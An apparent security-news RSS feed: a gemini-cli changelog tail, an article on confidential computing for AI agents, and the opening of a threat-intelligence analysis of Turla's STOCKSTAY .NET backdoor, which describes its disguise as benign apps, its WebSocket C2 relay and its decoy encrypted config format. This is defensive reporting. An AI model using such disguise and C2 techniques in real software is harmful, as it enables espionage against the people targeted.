<li>ci: update workflow logging and policy configurations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644136716" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27853" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27853/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27853">#27853</a></li>
<li>fix(core): Ensure zero-quota limits fail fast to prevent retry loop hang by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598585248" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27698" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27698/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27698">#27698</a></li>
<li>fix(core): handle multi-line escaped quotes in stripShellWrapper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezcoraspe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezcoraspe">@sanchezcoraspe</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528910595" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27467" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27467/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27467">#27467</a></li>
<li>fix(cli): prevent path traversal vulnerabilities during skill install… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ompatel-aiml/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ompatel-aiml">@ompatel-aiml</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625379514" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27767" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27767/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27767">#27767</a></li>
<li>Fix/pending tools and trust overrides by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jvargassanchez-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jvargassanchez-dot">@jvargassanchez-dot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644413103" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27854" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27854/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27854">#27854</a></li>
<li>ci: use internal environment for scheduled nightly releases (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651437952" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27865" data-hovercard-type="issue" data-hovercard-url="/google-gemini/gemini-cli/issues/27865/hovercard" href="https://github.com/google-gemini/gemini-cli/issues/27865">#27865</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4663727308" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27939" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27939/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27939">#27939</a></li>
<li>feat(core): Support GDC air-gapped Service Identity after auth library update by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sidhantgoyal-droid/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sidhantgoyal-droid">@sidhantgoyal-droid</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670536229" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27956" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27956/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27956">#27956</a></li>
<li>fix(cli): handle tmux false positive background detection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amelidev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amelidev">@amelidev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551922864" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27572" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27572/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27572">#27572</a></li>
<li>Add static eval source analyzer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572208527" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27631" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27631/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27631">#27631</a></li>
<li>fix(config): migrate coreTools setting to tools.core by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4668842010" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27947" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27947/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27947">#27947</a></li>
<li>fix(core-tools): resolve defensive path resolution for at-reference files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luisfelipe-alt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luisfelipe-alt">@luisfelipe-alt</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4667088257" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27943" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27943/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27943">#27943</a></li>
<li>Revert "fix(core-tools): resolve defensive path resolution for at-reference files" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4685914753" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27992" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27992/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27992">#27992</a></li>
<li>chore(release): bump version to 0.49.0-nightly.20260617.g4d3dcdce1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4689126213" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28003" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28003/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28003">#28003</a></li>
<li>Changelog for v0.48.0-preview.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gemini-cli-robot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gemini-cli-robot">@gemini-cli-robot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4687675018" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27999" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27999/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27999">#27999</a></li>
<li>fix(ci): provide fallbacks for package variables in nightly release by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4694939619" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28016" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28016/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28016">#28016</a></li>
<li>chore(deps): pin dependencies and enforce 14-day update cooldown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galz10/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galz10">@galz10</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669373167" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27948" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27948/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27948">#27948</a></li>
<li>fix(ci): append trailing slash to registry url in npmrc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4700184153" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28038" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28038/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28038">#28038</a></li>
<li>feat: add eval:inventory CLI command and reporting logic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691187614" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28009" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28009/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28009">#28009</a></li>
<li>fix: resolve workspace publish failures and scheduler event loop starvation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4707927237" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28063" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28063/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28063">#28063</a></li>
<li>fix(ci): use wombat dressing room fallback in nightly release to prevent ENEEDAUTH by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rmedranollamas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rmedranollamas">@rmedranollamas</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4722537313" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28104" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28104/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28104">#28104</a></li>
<li>Add JSON output for eval inventory by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ved015/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ved015">@ved015</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4705367608" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/28058" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/28058/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/28058">#28058</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezcoraspe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezcoraspe">@sanchezcoraspe</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528910595" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27467" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27467/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27467">#27467</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sidhantgoyal-droid/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sidhantgoyal-droid">@sidhantgoyal-droid</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670536229" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27956" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27956/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27956">#27956</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amelidev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amelidev">@amelidev</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551922864" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27572" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27572/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27572">#27572</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/google-gemini/gemini-cli/compare/v0.47.0...v0.49.0"><tt>v0.47.0...v0.49.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI security steals the spotlight at Confidential Computing Summit]]></title>
<description><![CDATA[For a decade, confidential computing has been chipping away at one of security’s hardest problems: data is well encrypted in transit and at rest, but when a processor works on it, that data sits in memory in the clear, exposed to anyone with privileged host access.



“Confidential computing’s ai...]]></description>
<link>https://tsecurity.de/de/3625337/ai-nachrichten/agentic-ai-security-steals-the-spotlight-at-confidential-computing-summit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625337/ai-nachrichten/agentic-ai-security-steals-the-spotlight-at-confidential-computing-summit/</guid>
<pubDate>Thu, 25 Jun 2026 18:50:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For a decade, confidential computing has been chipping away at one of security’s hardest problems: data is well encrypted in transit and at rest, but when a processor works on it, that data sits in memory in the clear, exposed to anyone with privileged host access.</p>



<p>“Confidential computing’s aim was to solve this with a trusted execution environment, a subset of the CPU that runs the encrypted workload and handles things like memory encryption,” said <a href="https://www.linkedin.com/in/marina-moore-5a7242105/" data-type="link" data-id="https://www.linkedin.com/in/marina-moore-5a7242105/">Marina Moore</a>, lead security researcher at <a href="https://edera.dev/" data-type="link" data-id="https://edera.dev/">Edera</a>.</p>



<p>For years the field felt like post-quantum cryptography PhD research scientist types agreeing the work is essential, while waiting for it to reach mainstream practitioners. At the <a href="https://events.linuxfoundation.org/confidential-computing-summit/" data-type="link" data-id="https://events.linuxfoundation.org/confidential-computing-summit/">Confidential Computing Summit</a> in San Francisco this week, the breakout use case came into focus: agentic AI.</p>



<h2 class="wp-block-heading">Like the web before HTTPS</h2>



<p>“I was in the really early days of HTTP, and then HTTPS came along pretty quickly,” said <a href="https://www.linkedin.com/in/mikebursell/" data-type="link" data-id="https://www.linkedin.com/in/mikebursell/">Mike Bursell</a>, executive director of the <a href="https://confidentialcomputing.io/" data-type="link" data-id="https://confidentialcomputing.io/">Confidential Computing Consortium</a>. He sees agentic AI where the web sat before certificate authorities and public key infrastructure brokered trust online. </p>



<p>“The original agent specifications were not written by security architects,” Bursell said, and “some of it feels in need of refinement.”</p>



<p>The gap confidential computing fills is attestation, which provides proof of what runs. The hardware hashes the memory and firmware of a protected execution environment and signs the result inside the chip, Bursell explained, producing a measurement a verifier checks against the expected software. Without it, an agent session shares the early web problem of open windows for hijacking, except the attackers are now agents themselves.</p>



<p>The old objection that confidential computing demanded exotic hardware is largely gone, Bursell said, now that it ships in AMD, Intel, and NVIDIA parts and turns on with a click <a href="https://www.infoworld.com/article/2256355/what-is-azure-confidential-computing.html" data-type="link" data-id="https://www.infoworld.com/article/2256355/what-is-azure-confidential-computing.html">in Microsoft Azure</a> or Google Cloud. The goal is to make confidential computing so accessible that secure execution becomes the default assumption rather than a specialized deployment choice, and that trust alarms go off when secure execution criteria are not met, much like how a user visiting a non-HTTPS website is greeted with a warning.</p>



<h2 class="wp-block-heading">Identity and attestation move into standards</h2>



<p>Many of the working sessions at the Confidential Computing Summit, hosted by the Linux Foundation, were about turning these mechanisms into standards, following the same path internet security took through bodies such as the IETF and IEEE.</p>



<p><a href="https://www.linkedin.com/in/raghu-yeluri-17550/" data-type="link" data-id="https://www.linkedin.com/in/raghu-yeluri-17550/">Raghu Yeluri</a>, senior principal engineer at Intel, detailed a composite attestation format that Intel, Microsoft, and NVIDIA built so that attestation data can span confidential VMs, their CPUs, and GPUs, without vendor-specific formats. Yeluri said the group hopes to advance that work toward an RFC within the next year.</p>



<p>That effort runs through the Confidential Computing Consortium, the Linux Foundation community where competing companies collaborate on shared infrastructure problems. The consortium is not trying to become a registry of trusted agents, Bursell added, but rather a place where companies can develop frameworks, best practices, and, equally important, antipatterns.</p>



<p>Identity drew some of the strongest interest at this week’s event. <a href="https://www.linkedin.com/in/khpawan/" data-type="link" data-id="https://www.linkedin.com/in/khpawan/">Pawan Khandavilli</a>, senior product manager at Microsoft, pointed to agent payment initiatives from Visa, Mastercard, and Google, the FIDO Alliance’s emerging agent work, SPIFFE workload identities, and RFC 8693 token exchange. The pieces already exist, Khandavilli argued, but “the vocabulary is fragmented.” The challenge now is connecting those identity systems to hardware-backed attestation rather than relying solely on software trust.</p>



<h2 class="wp-block-heading">The attack surface below the attestation</h2>



<p>Hardware-isolated environments are only as secure as the shared substrates beneath them. <a href="https://www.linkedin.com/in/zvonkok/" data-type="link" data-id="https://www.linkedin.com/in/zvonkok/">Zvonko Kaiser</a>, principal systems engineer at NVIDIA, argued that attestation protects the trusted execution environment itself but does not eliminate risks in the shared substrates underneath. The processor cache sits below every isolation boundary, and a 2026 technique called <a href="https://tdxray.cpusec.org/#explainer" data-type="link" data-id="https://tdxray.cpusec.org/#explainer">TDXRay</a> demonstrated how information could be observed across virtual machine boundaries. No layer above the cache, Kaiser argued, can completely hide what the cache itself sees.</p>



<p>The Kubernetes control plane presents another challenge. One etcd store may hold secrets for multiple tenants, while a shared scheduler decides where workloads run. Those shared services create opportunities for compromise that sit outside the guarantees provided by confidential computing hardware. </p>



<p><a href="https://www.linkedin.com/in/antoine-delignat-lavaud-27545276/" data-type="link" data-id="https://www.linkedin.com/in/antoine-delignat-lavaud-27545276/">Antoine Delignat Lavaud</a>, principal researcher at Microsoft, highlighted another limitation. Attestation can prove that a workload runs on authentic confidential computing hardware, but “it doesn’t tell you where it is running,” leaving questions of data residency and sovereignty unresolved.</p>



<p>“Confidential computing is hardware based. If and when vulnerabilities are discovered, it’s much harder to patch those and re-establish the security,” added Edera’s Moore.</p>



<p>Microsoft’s Khandavilli outlined four major gaps that still require industry coordination: binding agent identities directly to hardware, bringing attestation into the <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> that increasingly governs tool access, establishing trusted chains when agents delegate work to other agents, and enabling trust relationships across cloud providers. Intel’s Yeluri noted that confidential computing will not solve every security problem, but it provides the foundation upon which higher-level controls can be built.</p>



<h2 class="wp-block-heading">HTTPS for the agentic era</h2>



<p>What was clear from the Confidential Computing Summit is that security for AI agents increasingly resembles the trust infrastructure that underpins today’s internet. Certificates, identity brokers, verification services, and cryptographic handshakes established trust between systems that did not know each other. Agentic AI appears headed toward the same destination. </p>



<p>For example, last month the Linux Foundation announced DNS-AID, extending domain name system concepts into agent discovery and <a href="https://www.infoworld.com/article/4189361/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents.html" data-type="link" data-id="https://www.infoworld.com/article/4189361/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents.html">introducing an Agent Name Service framework</a> for agent identity.</p>



<p>Who ultimately operates those trust services for agents is “still coming out in the wash,” said Bursell. “Regulators, governments, software vendors, cloud providers, and others may all play roles. If you can’t establish trust, you can’t understand or manage risk.” </p>



<p>Confidential computing is focused on the layer beneath those systems, creating ways to verify the environments where agents execute and the actions they perform. If that work succeeds, the trust fabric that emerges around agents may end up looking remarkably similar to the one that quietly powers the internet today. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[STOCKSTAY Another Day: The Latest Addition to Turla’s Intelligence Gathering Apparatus]]></title>
<description><![CDATA[Written by: Jordan Jones

Introduction 
Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-01...]]></description>
<link>https://tsecurity.de/de/3624817/it-security-nachrichten/stockstay-another-day-the-latest-addition-to-turlas-intelligence-gathering-apparatus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624817/it-security-nachrichten/stockstay-another-day-the-latest-addition-to-turlas-intelligence-gathering-apparatus/</guid>
<pubDate>Thu, 25 Jun 2026 16:09:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Jordan Jones</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions. </span></p>
<p><span>Turla, and specifically their longstanding Snake implant, has been publicly </span><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a" rel="noopener" target="_blank"><span>attributed</span></a><span> by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). Turla is one of the oldest known cyber espionage groups with suspected activity dating back to </span><a href="https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/" rel="noopener" target="_blank"><span>at least 2004</span></a><span>. The actor remains active and continues to evolve its delivery methods, as demonstrated by its </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/"><span>deployment of specialized scripts</span></a><span> to intercept secure communications from Signal Messenger users, its </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/turla-galaxy-opportunity/"><span>hijacking of legacy criminal botnets</span></a><span> to target Ukrainian organizations, and its </span><a href="https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/" rel="noopener" target="_blank"><span>recent campaigns</span></a><span> targeting military defense sectors using the highly sophisticated KAZUAR toolkit. As part of our continued tracking of this group, this blog post provides an overview of our STOCKSTAY analysis, includes a timeline of key developmental and operational observations, and examines its similarities to KAZUAR to contextualize this new capability within Turla’s ever-growing arsenal.</span></p>
<h3><span>STOCKSTAY Overview</span></h3>
<p><span>STOCKSTAY is a multi-component backdoor written in .NET, using the Windows Forms framework, which communicates with its command and control (C2) via a secure WebSocket connection, utilizing the open-source </span><a href="https://github.com/sta/websocket-sharp" rel="noopener" target="_blank"><span>websocket-sharp</span></a><span> library. STOCKSTAY consists of several distinct components that communicate with one another via an inter-process communication (IPC) channel, based on the exchange of </span><a href="https://learn.microsoft.com/en-us/windows/win32/dataxchg/wm-copydata" rel="noopener" target="_blank"><span>WM_COPYDATA</span></a><span> messages. </span></p>
<p><span>STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, incorporating this disguise in both its file naming scheme and its storage of implant configuration, control messages, and response data. While initial versions of the malware observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig1.max-1000x1000.png" alt="Overview of STOCKSTAY malware architecture">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="nw27v">Figure 1: Overview of STOCKSTAY malware architecture</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>STOCKSTAY.STOCKBROKER</span></h4>
<p><span>STOCKSTAY.STOCKBROKER is a proxy-aware tunneler which provides network communication capabilities to the wider STOCKSTAY ecosystem. STOCKSTAY.STOCKBROKER, internally referred to as "</span><code>net</code><span>", can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between the server and the STOCKSTAY.STOCKMARKET orchestrator. As a result, all C2 communication between STOCKSTAY and the configured C2 server are handled by STOCKSTAY.STOCKBROKER, isolating the malware’s network communications from other malicious host-based activity on the infected machine. </span></p>
<h4><span>STOCKSTAY.STOCKMARKET</span></h4>
<p><span>STOCKSTAY.STOCKMARKET, internally referred to as “</span><code>cor</code><span>”, is the orchestrator of the STOCKSTAY ecosystem, and enables the implant’s configurability. The malware’s configuration is loaded from an encrypted on-disk configuration file which specifies several options regarding the malware’s execution, including the details of the remote WebSocket server required by STOCKSTAY.STOCKBROKER. The configuration file attempts to disguise itself as a legitimate file by including various legitimate URLs associated with cryptocurrency markets, as well as falsified descriptions of each configuration field (Figure 2). Encrypted configuration data is embedded within the decoy fields, which is decrypted by STOCKSTAY.STOCKMARKET.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
  "Name": "StockMarket",
  "Description": "An application for getting information about current events on trading platforms. To set the time for updating information, enter a value in minutes in the `Interval` field. In the future, support for themes will be added. The `SystemConfiguration` field stores the system settings of the application. In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`.",
  "Theme": "Dark",
  "SystemConfiguration": [
    "1D.AA.79.9F.45.AA.04.B3.&lt;snipped&gt;.68.0A.5D.A3.E6.A3.82.FA",
    "6F.41.4D.6D.C3.20.E5.32.&lt;snipped&gt;.00.B8.26.DF.E1.13.0A.21",
    "4.4.3.12"
  ],
  "Interval": 10,
  "Services": [
    "wss://ws-api.binance.com:443/ws-api/v3",
    "wss://ws-feed.exchange.coinbase.com",
    "wss://ws-feed-public.sandbox.exchange.coinbase.com",
    "wss://stream.bybit.com/v5/public/spot",
    "wss://stream.bybit.com/v5/public/linear"
  ],
  "Version": "2022-12-21"
}</code></pre>
<p><span><span>Figure 2: Encrypted STOCKSTAY configuration file format, falsely describing itself as an application for trading information</span></span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>{
  "internal_id": "&lt;server_identifier&gt;",
  "internal_key": "&lt;server_public_key&gt;",
  "interval_engine": "600000",
  "level_info": "0",
  "time_scale": "1",
  "span_min": "9",
  "span_max": "18",
  "rate": "2700",
  "rate_control": "false",
  "service": "&lt;websocket_c2_url&gt;",
  "days_not_work": "Saturday;Sunday;",
  "system_properties": "eyJzeXN0ZW1fZGF0YV9zaXplIjoiNDAwMDAwIn0="
}</code></pre>
<p><span><span>Figure 3: Decrypted STOCKSTAY configuration file format (extracted from </span><code>SystemConfiguration</code><span> field)</span></span></p></div>
<div class="block-paragraph_advanced"><p><span>STOCKSTAY.STOCKMARKET communicates with STOCKSTAY.STOCKBROKER in order to provide details of the WebSocket server, and to subsequently send and receive messages via the established WebSocket connection, usually containing the results of executed commands. STOCKSTAY.STOCKMARKET also communicates with the STOCKSTAY.STOCKTRADER component in order to issue commands to be executed on the infected host.</span></p>
